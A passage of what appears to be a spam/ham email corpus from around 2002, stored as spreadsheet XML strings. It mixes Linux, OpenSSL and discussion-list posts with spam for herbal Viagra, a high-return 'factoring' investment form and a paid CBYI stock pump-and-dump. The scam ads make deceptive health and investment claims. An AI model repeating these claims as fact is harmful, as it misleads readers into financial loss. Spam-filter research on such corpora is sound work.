 &gt; before a licence change is allowed.
 &gt;
 &gt; Also there's some stuff about French consumer law forbidding sale
 &gt; without guarantee of anything, so software delivered as-is
 &gt; breaches consumer law in France. But I didn't really follow that.
 My French is a bit iffy these days, but if this is true, does it not also
 nullify Microsoft, Adobe and WinZip licences amongst most others? These all
 claim no liability, no guarantees (M$ say delivered "with all faults", so
 at least they are honest).
 /Ciaran.
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Herbal Viagra 30 day trial....                CRUA
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;head&gt;
 &lt;title&gt;&lt;/title&gt;
 &lt;/head&gt;
 &lt;body bgcolor=3D"#FFFFFF"&gt;
 &lt;table width=3D500 cellpadding=3D10 border=3D0&gt;&lt;tr&gt;
 &lt;td&gt;&lt;font  face=3D"bankgothic, western" color=3D"#6600FF" 
 size=3D5&gt;&lt;p&gt;&lt;b&gt;
 &lt;a
 href=3D"http://www.herbs4you.net/?id=3D609"&gt;
 Mother Natures all Natural Marital Aid&lt;br&gt; for Men and
 Women - Your's Risk Free!&lt;/b&gt;&lt;/p&gt;&lt;/font&gt;
 &lt;font face=3D"arial black" color=3D"#000000" size=3D3&gt;&lt;p&gt;The
 all natural safe formula for men and women your's risk
 free for 30 days. Mother Nature's wonder pill of the
 21st century.&lt;p&gt;
 &lt;li&gt;Increased Sensation&lt;/li&gt;&lt;br&gt;&lt;li&gt;Increased
 Frequency&lt;/li&gt;&lt;br&gt;
 &lt;li&gt;Increased Pleasure&lt;/li&gt;&lt;br&gt;&lt;li&gt;Increased
 Desire&lt;/li&gt;&lt;br&gt;
 &lt;li&gt;Increased Stamina&lt;/li&gt;&lt;br&gt;&lt;li&gt;Increased
 Libido&lt;/li&gt;&lt;/font&gt;&lt;br&gt;&lt;br&gt;
 Both male and female formulas!&lt;br&gt;&lt;p&gt;&lt;body
 bgcolor=3D"#FFFFFF"&gt;
 Order Your  Trial Today !&lt;/a&gt;&lt;/p&gt;&lt;/font&gt;
 &lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 &lt;table width=3D500 cellpadding=3D10 border=3D0&gt;&lt;tr&gt;&lt;td&gt;
 &lt;font face=3Darial size=3D1.5&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;p&gt;to depart
 from further contacts
 &lt;a
 href=3D"http://www.herbs4you.net/service.html"&gt;visit
 here&lt;/a&gt;&lt;/p&gt;&lt;/font&gt;
 &lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 tbeyer
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Defending Unliked Speech Re: Hanson's Sept 11 message in the
</t>
  </si>
  <si>
    <t xml:space="preserve">Robert Harley writes:
 &gt; Chuck Murcko wrote:
 &gt; &gt; But I must feel obligated to defend to the death your right to do so.
 &gt;
 &gt; Je dsapprouve ce que vous dites, mais je dfendrai jusqu' ma mort votre
 &gt; droit de le dire
 &gt; - Arouet Le Jeune, dit Voltaire (1694-1778).
 Here's hoping that tradition perseveres for the novelist
 currently on trial in Paris for calling Islam "the stupidest
 religion"...
 http://ca.news.yahoo.com/020917/5/ozxa.html
 # Tuesday September 17 11:07 AM EST
 #
 # French Writer Tried As Anti-Islam, Protest Erupts
 # By Caroline Brothers
 #
 # PARIS (Reuters) - Provocative French novelist Michel Houellebecq
 # faced a Paris court on Tuesday for allegedly inciting racial hatred
 # by calling Islam "the stupidest religion" and its holy book the
 # Koran a depressing read.
 #
 # The case, brought against him by four Muslim groups, is a cause
 # celebre reminiscent of the Salman Rushdie affair, pitting freedom of
 # expression against religious sensitivities.
 #
 # The Muslim groups, which include the Mecca-based World Islamic
 # League and the Paris Mosque, accuse the writer of insulting Islam in
 # an interview with the literary magazine "Lire" during last year's
 # launch of his novel "Plateforme."
 #
 # Lire is also on trial over the remarks, which have taken on an added
 # significance in France in the atmosphere of heightened sensitivity
 # and concern about Islam following the September 11 attacks by Muslim
 # radicals in the United States.
 #
 # Shortly after the trial started, 11 people in the courtroom stripped
 # off their shirts to reveal T-shirts saying "No to the censure of the
 # imams" and "Marianne veiled, Marianne raped" -- a reference to the
 # female symbol of the French republic.
 #
 # "Freedom of expression! freedom of expression!" they and other
 # Houellebecq supporters chanted after they were thrown out of the
 # courtroom at the main law courts in central Paris.
 #
 # While intellectuals argued before the trial that Houellebecq should
 # be free to write what he wants, Lyon Mosque rector Kamel Kabtan
 # retorted: "We are for freedom of expression, but not for insulting
 # communities."
 #
 # BETE NOIRE
 #
 # Houellebecq, 45, the bete noire of contemporary French literature,
 # is no stranger to controversy. He offended conservatives and the
 # politically correct left with his 1998 novel "Les Particules
 # Elementaires" ("Atomised" in English).
 #
 # Paris Mosque rector Dalil Boubakeur says Muslims have been insulted
 # once before by Houellebecq, who had the main character in Plateforme
 # admit he felt "a quiver of glee" every time a "Palestinian
 # terrorist" was killed.
 #
 # The World Islamic League, the Lyon Mosque and the National
 # Federation of Muslims in France have joined the Paris Mosque in
 # bringing Houellebecq to trial.
 #
 # France's Human Rights League joined them as a civil party, saying
 # Houellebecq's comments amounted to "Islamophobia" and deserved to be
 # sanctioned as part of the league's struggle against discrimination
 # and racism.
 #
 # The Paris Mosque has hired Jean-Marc Varaut, one of France's leading
 # trial lawyers, whose past clients include Maurice Papon, the former
 # official condemned in 1998 for Nazi-era crimes against humanity for
 # sending Jews to death camps.
 #
 # RESTORING BLASPHEMY?
 #
 # Houellebecq's lawyer Emmanuel Pierrat argues that the case
 # effectively re-establishes the notion of blasphemy, despite the fact
 # that France as a secular state has no such law, and says
 # Houellebecq's opponents want to deny him freedom of expression.
 #
 # He also argues that the interview in Lire truncated a six-hour
 # conversation and Houellebecq was not given the chance to approve the
 # article before it appeared.
 #
 # Houellebecq's publisher Flammarion has distanced itself from the
 # author, whose comments some say may have cost him France's
 # prestigious Goncourt prize -- for which he had been a contender.
 #
 # The novelist, who lives outside Cork, Ireland, writes in a detached
 # style about a bleak world in which people have forgotten how to
 # love.
 #
 # Translated into 25 languages, "Atomised" incensed France's 1968
 # generation with its scathing descriptions of the hippie era but won
 # him France's November prize in 1998 and the Impac award, one of the
 # world's biggest fiction prizes.
 #
 # Losing his case may mean a year in jail or a $51,000 fine.
 - Gordon
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Securing multiple virtual hosts
</t>
  </si>
  <si>
    <t xml:space="preserve">I am trying to secure three of four virtual hostnames on our Apache server.
 We are not taking credit card orders or user's personal information, but are
 merely hoping to secure email and calendar web transactions for our users.
 We are not running any secure applications on the root host.
 I have been testing this week with CA, client, and host certificate
 requests, certificates, and keys, and think I have a fairly good beginner's
 grasp of the commands and command line options.
 My questions are:
 1.  Is it necessary to create a CA certificate for each of the secure
 virtual hosts, or can one CA certificate for the root be used to sign each
 of the keys for all three common names we are trying to secure?
 2.  Even though the root host is not conducting secure transactions, am I
 correct in configuring the server with a CACertificateFile in the main body
 of httpsd.conf and then setting the CACertificateFile for each virtual host
 in the &lt;Virtual . . .&gt; section of httpsd.conf?  This sort of assumes the
 answer to 1. is  - you need a CA for each virtual host.
 3.  Is it necessary to create a client certificate to distribute to our
 users, or is it sufficient to have the CA certificate and a server
 certificate for the virtual hosts?  Wouldn't a client certificate only be
 necessary if we were trying to verify the client's identity?  Would that be
 a good idea given our scenario?
 Thanks in advance for your help.
 ______________________________________________________________________
 OpenSSL Project                                 http://www.openssl.org
 User Support Mailing List                    openssl-users@openssl.org
 Automated List Manager                           majordomo@openssl.org
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Ed Cone: "I told my grandmother goodbye."
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://scriptingnews.userland.com/backissues/2002/09/23#When:9:11:14PM
 Date: Tue, 24 Sep 2002 04:11:14 GMT
 Ed Cone[1]: "I told my grandmother goodbye."
 [1] http://radio.weblogs.com/0107946/2002/09/24.html#a186
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: apt-get problem ?
</t>
  </si>
  <si>
    <t xml:space="preserve">On Mon, 07 Oct 2002 08:01:24 +0200, Roi Dayan &lt;dejavo@punkass.com&gt; wrote:
 &gt; When I try to use apt-get upgrade
 &gt; it wants to install libusb while I got it
 &gt; (same version)
 &gt; and all collapse because of this.
     I had that too; I removed libusb (I don't think it needed --nodeps) and then 'apt-get -f install' and all was well.
 ------------------------------------------------------------------------
 Brian Fahrlnder              Linux Zealot, Conservative, and Technomad
 Evansville, IN                    My Voyage: http://www.CounterMoon.com
 ICQ  5119262
 ------------------------------------------------------------------------
 angegangen, Schlange-Hften, sein es ganz rber jetzt. Bgel innen fest,
 weil es eine lange, ssse Fahrt ist. 
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Join the fight to quality.  Make 36 Annually secured
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &lt;head&gt;
 &lt;title&gt;&lt;/title&gt;
 &lt;/head&gt;
 &lt;body bgcolor="#000000" text="#FFFF00"&gt;
 &lt;p align="center"&gt;&lt;font size="4"&gt;&lt;b&gt;FINANCIAL INVESTMENT CENTER&lt;br&gt;
 INSIDER NEWS&amp;nbsp;&lt;br&gt;
 &lt;br&gt;
 &lt;/b&gt;
 &lt;/font&gt;
 &lt;i&gt;&lt;font color="#FF0000"&gt;See bottom of page for removal instructions.&lt;/font&gt;&lt;/i&gt;&lt;font size="4"&gt;&lt;b&gt;
 &lt;br&gt;
 &lt;/b&gt;
 &lt;br&gt;
 &lt;/font&gt;
 Stock Market has you concerned? Join the flight to quality. Make over 25% annually, paid monthly by Factoring Account Receivables.&amp;nbsp;&lt;br&gt;
 Discover what banks have known for decades. Harness the power and liquidity of Factoring  Collateralized Account Receivables.&amp;nbsp;&lt;br&gt;
 &lt;br&gt;
 &lt;br&gt;
 A safe haven to make strong returns, while stock markets are volatile.&amp;nbsp;&lt;br&gt;
 Please Be over the age of 18. Serious inquiries only.&amp;nbsp;&lt;br&gt;
 &lt;br&gt;
 &lt;br&gt;
 &lt;br&gt;
 &lt;br&gt;
 For A Free In-Depth Information Package. Please fill out the form below.&lt;b&gt;&lt;br&gt;
 &lt;font size="4"&gt;
 &lt;br&gt;
 &lt;br&gt;
 CONTACT ME&lt;br&gt;
 &lt;/p&gt;
 &lt;form action="http://www.aquinas.com/cgi-bin/formmail.pl" method=POST&gt;
 &lt;input type=hidden name="subject" value="Invest Lead"&gt;
 &lt;input type=hidden name="recipient" value="craigman3us@yahoo.com"&gt;
   &lt;div align="center"&gt;
 &lt;center&gt;
 &lt;table border="0" width="89%" cellspacing="0" cellpadding="5"&gt;
   &lt;tr&gt;
 &lt;td width="42%" align="right"&lt;i&gt;First
   Name:&lt;/td&gt;
 &lt;td width="58%"&gt;&lt;input type="text" name="firstname" size="20"&gt;&lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt;
 &lt;td width="42%" align="right"&lt;i&gt;Last
   Name:&lt;/i&gt;&lt;/td&gt;
 &lt;td width="58%"&gt;&lt;input type="text" name="lastname" size="25"&gt;&lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt;
 &lt;td width="42%" align="right"&lt;i&gt;Address:&lt;/i&gt;&lt;/td&gt;
 &lt;td width="58%"&gt;&lt;input type="text" name="address" size="30"&gt;&lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt;
 &lt;td width="42%" align="right"&lt;i&gt;City:&lt;/i&gt;&lt;/td&gt;
 &lt;td width="58%"&gt;&lt;input type="text" name="city" size="25"&gt;&lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt;
 &lt;td width="42%" align="right"&lt;i&gt;State:&lt;/i&gt;&lt;/td&gt;
 &lt;td width="58%"&gt;&lt;input type="text" name="state" size="6"&gt;&lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt;
 &lt;td width="42%" align="right"&lt;i&gt;Zip
   Number:&lt;/i&gt;&lt;/td&gt;
 &lt;td width="58%"&gt;&lt;input type="text" name="zipnumber" size="12"&gt;&lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt;
 &lt;td width="42%" align="right"&lt;i&gt;Country:&lt;/i&gt;&lt;/td&gt;
 &lt;td width="58%"&gt;&lt;input type="text" name="country" size="25"&gt;&lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt;
 &lt;td width="42%" align="right"&lt;i&gt;Home
   Number:&lt;/i&gt;&lt;/td&gt;
 &lt;td width="58%"&gt;&lt;input type="text" name="homenumber" size="16"&gt;&lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt;
 &lt;td width="42%" align="right"&lt;i&gt;Business
   Number:&lt;/i&gt;&lt;/td&gt;
 &lt;td width="58%"&gt;&lt;input type="text" name="businessnumber" size="16"&gt;&lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt;
 &lt;td width="42%" align="right"&lt;i&gt;Email
   Address:&lt;/i&gt;&lt;/td&gt;
 &lt;td width="58%"&gt;&lt;input type="text" name="emailaddress" size="25"&gt;&lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt;
 &lt;td width="42%" align="right"&lt;i&gt;Best
   time to call:&lt;/i&gt;&lt;/td&gt;
 &lt;td width="58%"&gt;&lt;input type="text" name="besttocall" size="15"&gt;&lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt;
 &lt;td width="42%"&gt;&lt;/td&gt;
 &lt;td width="58%"&gt;&lt;input type="submit" value="Submit" name="B1"&gt;&lt;input type="reset" value="Reset" name="B2"&gt;&lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;/center&gt;
   &lt;/div&gt;
 &lt;p align="center"&gt;&amp;nbsp;&lt;/p&gt;
 &lt;/form&gt;
 &lt;/font&gt;&lt;/b&gt;
 &lt;form action="http://www.aquinas.com/cgi-bin/formmail.pl" method=POST&gt;
 &lt;input type=hidden name="subject" value="Remove"&gt;
 &lt;input type=hidden name="recipient" value="craigman3us@yahoo.com"&gt;
   &lt;b&gt;
 &lt;font size="4"&gt;
 &lt;p align="center"&gt;To Be Removed:&lt;/p&gt;
 &lt;table border="0" width="89%" cellspacing="0" cellpadding="5"&gt;
   &lt;tr&gt;
 &lt;td width="42%" align="right"&lt;i&gt;Email
   Address:&lt;/i&gt;&lt;/td&gt;
 &lt;td width="58%"&gt;&lt;input type="text" name="emailaddress" size="25"&gt; &lt;b&gt;
 &lt;font size="4"&gt;
 &lt;input type="submit" value="Submit" name="B3"&gt;&lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
   &lt;/form&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Sunday I drove from Portland down to the Woodburn Dragstrip to check out 
 the NEDRA Nationals. &lt;http://www.nedra.com/&gt;
 The electric cars, motorcycles and dragsters had some great times and I 
 ended up with a few pics and a nice deep burn...
 John Waylan (who was interviewed in Wired a few years back) pulled out a 
 14.4 second run in the quarter mile (91mph), on a battery pack that 
 hasn't been broken in yet. He expects to break his record next year 
 topping his 13.1sec/99mph run a couple of years ago. He's shooting for a 
 12 second run.
 John also took out a replica 1908 Oldsmobile for a respectable 47mph 
 run. (Remember, we started out with electric cars.)
 Near the end of the day, Kilacycle took the track with an amazing 111mph 
 run. Talk about a crotch rocket.
 ...Ross...
 On Saturday, August 31, 2002, at 01:45  AM, Adam L. Beberg wrote:
 &gt; Personally I don't think Americans will ever go electric, there is too 
 &gt; much
 &gt; testosterone linked to the auto as the male's primary form of 
 &gt; compesating
 &gt; for other things. See.. now that's a job for you femanists, teach women 
 &gt; not
 &gt; to fall for a fast environmentally destuctive vehicle, you should only 
 &gt; have
 &gt; to rewrite 98% of the genome ;)
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Adam dont job for no one, see.
</t>
  </si>
  <si>
    <t xml:space="preserve">
 A groys gesheft zol er hobn mit shroyre vus er hot, zol men bay im nit
 fregn, un vos men fregt zol er nisht hobn, and if that aint the truth
 nutin is.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [SAtalk] SA CGI Configurator Scripts
</t>
  </si>
  <si>
    <t xml:space="preserve">I have been trying to research via SA mirrors and search engines if a canned
 script exists giving clients access to their user_prefs options via a
 web-based CGI interface. Numerous ISPs provide this feature to clients, but
 so far I can find nothing. Our configuration uses Amavis-Postfix and ClamAV
 for virus filtering and Procmail with SpamAssassin for spam filtering. I
 would prefer not to have to write a script myself, but will appreciate any
 suggestions.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</si>
  <si>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Re: Limbo beta 2 ?
</t>
  </si>
  <si>
    <t xml:space="preserve">On Mon, Aug 12, 2002 at 11:06:18PM +0000,  Angles  Puglisi wrote:
 &gt; Michel Alexandre Salim (salimma1@yahoo.co.uk) wrote*:
 &gt; Limbo beta2 ? I'm running Limbo 7.3.92 with kernel 4.2.18-5.58, is what I am running
 &gt; an "older" version of the Limbo beta, it is it "the" limbo beta?
 The current version of the Limbo beta is 7.3.93 (yeah, they should
 have renamed it, but they didn't). It's in the same
 redhat/linux/beta/limbo directory on the ftp servers. Just check the
 redhat-release package to find out which version is on the server. 
 Looking at ftp.redhat.com, the current one is redhat-release-7.3.93-2.
 If you're using GNOME2 from the beta, I'd upgrade as there were some
 important bugfixes since the first beta. The only thing to watch out
 for is that Limbo2 switched gcc to 3.2, which is once again
 incompatible with the previous gcc (v3.1 shipped in Limbo1).
 gary
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Clarion comes to Australia!
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85514221
 Date: Not supplied
 The legendary Clarion Writers' Workshop -- of which I am an alumnus, class of 
 '92 -- has spun out another satellite branch (Clarion West, in Seattle, has 
 been going for some years now). The new workshop, Clarion South, will be held 
 in Queensland, Australia, in 2004, so that antipodeans can also attend 
 science-fiction bootcamp without travelling to America. Link[1] Discuss[2] (_
 Thanks, Pat!_)
 [1] http://www.clarionsouth.org/
 [2] http://www.quicktopic.com/boing/H/fXD4NLwaVDe
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Bits from the job front...
</t>
  </si>
  <si>
    <t xml:space="preserve">As yet another wave of people I know seem to have lost their jobs last week,
 here is the latest in what I'm seeing...
 * Even knowing a CTO/CEO/CFO may not even get your resume looked at, the
 feedback I'm getting is that hiring managers are only considering family
 and extended family for jobs - everyone has plenty of unemployed relatives.
 * Most job sites are now almost empty - so the practice of posting "resume
 bait" jobs is coming to an end. The postings they do have are months old
 bait. This is now a completely pointless way to look for a job.
 * We're almost flatlne in jobs created for several months, where population
 growth needs about 120k jobs a month to keep things steady.
 * Unemployment rates are only staying steady becasue people drop out of the
 workforce number after they cant find a job for a long time. The "not in
 labor force" is rising 400k a month. International numbers are no better -
 technology is replacing people, especially the people tha tmake the
 technoogy.
 * Grad school programs are stuffed full of people for every non-tech major.
 Colleges are having big headaches dealing with all the day-job refugees.
 * Spam for porn, ink, and stocks has dropped off, spam (the english ones I
 see subject lines for) now seems to be dominated by work-at-home scams and
 resume services. That's got to be a BAD sign.
 * FoRK is now almost all spam, somebody fix the damn subscriber-only-posting
 setting already, dont make me show up at your house Rohit ;)
 - Adam L. "Duncan" Beberg
   http://www.mithral.com/~beberg/
   beberg@mithral.com
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [ILUG] Re: serial console...not quite working
</t>
  </si>
  <si>
    <t xml:space="preserve">John P. Looney stated the following on Thu, Aug 29, 2002 at 03:31:11PM +0100 :
 &gt;  I'm not sure what exactly is wrong with this, but I can't get a redhat
 &gt; 7.1 box to use ttyS0 as a console.
 &gt; 
 &gt;  The relevant bits of /boot/grub/grub.conf are:
 &gt; 
 &gt; serial --unit=0 --speed=115200
 &gt; terminal --timeout=2 console serial
 &gt; title=linux
 &gt;    root (hd0,4)
 &gt;    kernel /boot/bzImage ro root=/dev/md0 console=ttyS0,115200n81
 															     ^
 That 1 is unneeded and is probably whats upsetting your kernel
 we use "console=ttyS0,9600n8" but the 9600 is mainly cos we are a cisco
 shop and its to keepo everyhting the same.
 Colin
 -- 
 "Design" is like a religion - too much of it makes you inflexibly and unpopular.
 		Linus Torvalds
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Toners and inkjet cartridges for less....          BLOEEYS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</si>
  <si>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srgreen
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: FW: FOCUS ON VALUE
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;HTML&gt;&lt;HEAD&gt;&lt;TITLE&gt;&lt;/TITLE&gt;&lt;META http-equiv=3D=22Content-Type=22 content=3D=22=
 text/html; charset=3Dwindows-1252=22&gt;&lt;STYLE&gt;A:link =7BTEX-DECORATION: none=7D=
 A:active =7BTEXT-DECORATION: none=7DA:visited =7BTEXT-DECORATION: none=7DA:h=
 over =7BCOLOR: =230033ff; TEXT-DECORATION: underline=7D&lt;/STYLE&gt;&lt;META conten=
 t=3D=22MSHTML 6.00.2713.1100=22 name=3D=22GENERATOR=22&gt;&lt;/HEAD&gt;
 &lt;BODY text=3D=22=23000000=22 vLink=3D=22=230033ff=22 link=3D=22=230033ff=22 bgColor=
 =3D=22=23CCCC99=22&gt;&lt;TABLE borderColor=3D=22=23660000=22 cellSpacing=3D=220=22 cellP=
 adding=3D=220=22 border=3D=220=22 width=3D=22100%=22&gt;&lt;TR&gt;&lt;TD bgColor=3D=22=23CCCC99=22=
  valign=3D=22top=22 colspan=3D=222=22 height=3D=2227=22&gt;
 &lt;font size=3D=226=22 face=3D=22Arial, Helvetica, sans-serif=22 color=3D=22=23660=
 000=22&gt;
 &lt;b&gt;OTC&lt;/b&gt;&lt;/font&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;TR&gt;&lt;TD height=3D=222=22 bgcolor=3D=22=236a694f=22&gt;=
 &lt;font size=3D=225=22 face=3D=22Times New Roman, Times, serif=22 color=3D=22=23FF=
 FFFF=22&gt;
 &lt;b&gt;&amp;nbsp;Newsletter&lt;/b&gt;&lt;/font&gt;&lt;/TD&gt;&lt;TD height=3D=222=22 bgcolor=3D=22=236a694=
 f=22&gt;&lt;div align=3D=22right=22&gt;&lt;font color=3D=22=23FFFFFF=22&gt;
 &lt;b&gt;Discover Tomorrow's Winners&amp;nbsp;&lt;/b&gt;&lt;/font&gt;&lt;/div&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;TR&gt;&lt;TD =
 height=3D=2225=22 colspan=3D=222=22 bgcolor=3D=22=23CCCC99=22&gt;&lt;table width=3D=22100%=
 =22 border=3D=220=22 cellspacing=3D=220=22 cellpadding=3D=225=22&gt;&lt;tr&gt;&lt;td valign=3D=22=
 middle=22 height=3D=222=22&gt;&lt;table width=3D=22300=22 border=3D=221=22 cellspacing=3D=
 =220=22 cellpadding=3D=220=22 bordercolor=3D=22=23660000=22 bgcolor=3D=22=23EBEDCB=22=
  height=3D=225=22 align=3D=22center=22&gt;&lt;tr&gt;&lt;td valign=3D=22middle=22 height=3D=228=22=
 &gt;&lt;div align=3D=22center=22&gt;
 &lt;font face=3D=22Arial, Helvetica, sans-serif=22 color=3D=22=23660000=22 size=3D=
 =225=22&gt;
 &lt;b&gt;For Immediate Release&lt;/b&gt;&lt;/font&gt;&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/td&gt;&lt;/tr&gt;&lt;t=
 r&gt;&lt;td&gt;&lt;table width=3D=22100%=22 border=3D=221=22 cellspacing=3D=220=22 cellpaddin=
 g=3D=228=22 align=3D=22center=22 bgcolor=3D=22=23fafaf5=22 bordercolor=3D=22=23660000=
 =22&gt;&lt;tr&gt;&lt;td bgcolor=3D=22=23fafaf5=22 valign=3D=22top=22 height=3D=22453=22&gt;
 &lt;p&gt;&lt;font face=3D=22Verdana, Arial, Helvetica, sans-serif=22 size=3D=22-1=22&gt;
 &lt;b&gt;Cal-Bay (Stock Symbol: CBYI)&lt;/b&gt;
 &lt;br&gt;Watch for analyst =22Strong Buy Recommendations=22 and several adviso=
 ry newsletters picking CBYI.  CBYI has filed to be traded on the OTCBB, =
 share prices historically INCREASE when companies get listed on this lar=
 ger trading exchange. CBYI is trading around 25 cents and should skyrock=
 et to =242.66 - =243.25 a share in the near future.&lt;br&gt;
 &lt;b&gt;&lt;i&gt;Put CBYI on your watch list, acquire a position TODAY.&lt;/i&gt;&lt;/b&gt;&lt;/f=
 ont&gt;&lt;/p&gt;
 &lt;p&gt;&lt;font face=3D=22Verdana, Arial, Helvetica, sans-serif=22 size=3D=22-1=22&gt;
 &lt;b&gt;REASONS TO INVEST IN CBYI&lt;/b&gt;&lt;/font&gt;
 &lt;li&gt;&lt;font face=3D=22Verdana, Arial, Helvetica, sans-serif=22 size=3D=22-1=22&gt;=
 A profitable company and is on track to beat ALL earnings estimates=21&lt;/=
 font&gt;
 &lt;li&gt;&lt;font face=3D=22Verdana, Arial, Helvetica, sans-serif=22 size=3D=22-1=22&gt;=
 One of the FASTEST growing distributors in environmental &amp;amp; safety e=
 quipment instruments.&lt;/font&gt;
 &lt;li&gt;&lt;font face=3D=22Verdana, Arial, Helvetica, sans-serif=22 color=3D=22=2300=
 0000=22 size=3D=22-1=22&gt;
 Excellent management team, several EXCLUSIVE contracts.  IMPRESSIVE cli=
 ent list including the U.S. Air Force, Anheuser-Busch, Chevron Refining =
 and Mitsubishi Heavy Industries, GE-Energy &amp;amp; Environmental Research.=
 &lt;/font&gt;
 &lt;p&gt;&lt;font face=3D=22Verdana, Arial, Helvetica, sans-serif=22 size=3D=22-1=22&gt;
 &lt;b&gt;RAPIDLY GROWING INDUSTRY&lt;/b&gt;
 &lt;br&gt;Industry revenues exceed =24900 million, estimates indicate that the=
 re could be as much as =2425 billion from =22smell technology=22 by the end=
  of 2003.&lt;/font&gt;&lt;/p&gt;
 &lt;p&gt;&lt;font face=3D=22Verdana, Arial, Helvetica, sans-serif=22 size=3D=22-1=22&gt;
 &lt;b&gt;=21=21=21=21=21CONGRATULATIONS=21=21=21=21=21&lt;/b&gt;&lt;br&gt;Our last recommendation t=
 o buy ORBT at =241.29 rallied and is holding steady at =243.50=21 Congratul=
 ations to all our subscribers that took advantage of this recommendation=
 .&lt;/font&gt;&lt;/p&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;
 &lt;p align=3D=22center=22&gt;&lt;font size=3D=22-1=22 face=3D=22Verdana, Arial, Helveti=
 ca, sans-serif=22 color=3D=22=23660000=22&gt;
 ALL removes HONORED. Please allow 7 days to be removed and send ALL add=
 resses to:
 &lt;font color=3D=23ff0000&gt;
 &lt;a href=3D=22mailto:goneforgood=40btamail.net.cn=22&gt;GoneForGood=40btamail.ne=
 t.cn
 &lt;/a&gt;&lt;/font&gt;&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;table width=3D=22100%=22 border=3D=221=22 c=
 ellspacing=3D=220=22 cellpadding=3D=220=22 bordercolor=3D=22=23660000=22&gt;&lt;tr&gt;&lt;td b=
 gcolor=3D=22=23660000=22 height=3D=228=22&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td bgcolor=3D=22=23=
 FFFFCC=22&gt;&lt;table width=3D=22100%=22 border=3D=220=22 cellspacing=3D=220=22 cellpad=
 ding=3D=224=22&gt;&lt;tr&gt;&lt;td&gt;
 &lt;font size=3D=22-2=22 face=3D=22Verdana, Arial, Helvetica, sans-serif=22&gt;
 Certain statements contained in this news release may be forward-lookin=
 g statements within the meaning of The Private Securities Litigation Ref=
 orm Act of 1995. These statements may be identified by such terms as =22e=
 xpect=22, =22believe=22, =22may=22, =22will=22, and =22intend=22 or similar terms=
 . We are NOT a registered investment advisor or a broker dealer. This is=
  NOT an offer to buy or sell securities. No recommendation that the secu=
 rities of the companies profiled should be purchased, sold or held by in=
 dividuals or entities that learn of the profiled companies. We were paid=
  =2427,000 in cash by a third party to publish this report. Investing in =
 companies profiled is high-risk and use of this information is for readi=
 ng purposes only. If anyone decides to act as an investor, then it will =
 be that investor's sole risk. Investors are advised NOT to invest withou=
 t the proper advisement from an attorney or a registered financial broke=
 r. Do not rely solely on the information presented, do additional indepe=
 ndent research to form your own opinion and decision regarding investing=
  in the profiled companies. Be advised that the purchase of such high-ri=
 sk securities may result in the loss of your entire investment.  Not int=
 ended for recipients or residents of CA,CO,CT,DE,ID, IL,IA,LA,MO,NV,NC,O=
 K,OH,PA,RI,TN,VA,WA,WV,WI. Void where prohibited.  The owners of this pu=
 blication may already own free trading shares in CBYI and may immediatel=
 y sell all or a portion of these shares into the open market at or about=
  the time this report is published.  Factual statements are made as of t=
 he date stated and are subject to change without notice.
 &lt;br&gt;Copyright c 2001&lt;/font&gt;&lt;hr width=3D=22100%=22 noShade size=3D=221=22&gt;&lt;/td=
 &gt;&lt;/tr&gt;&lt;/table&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;TR&gt;&lt;TD cols=
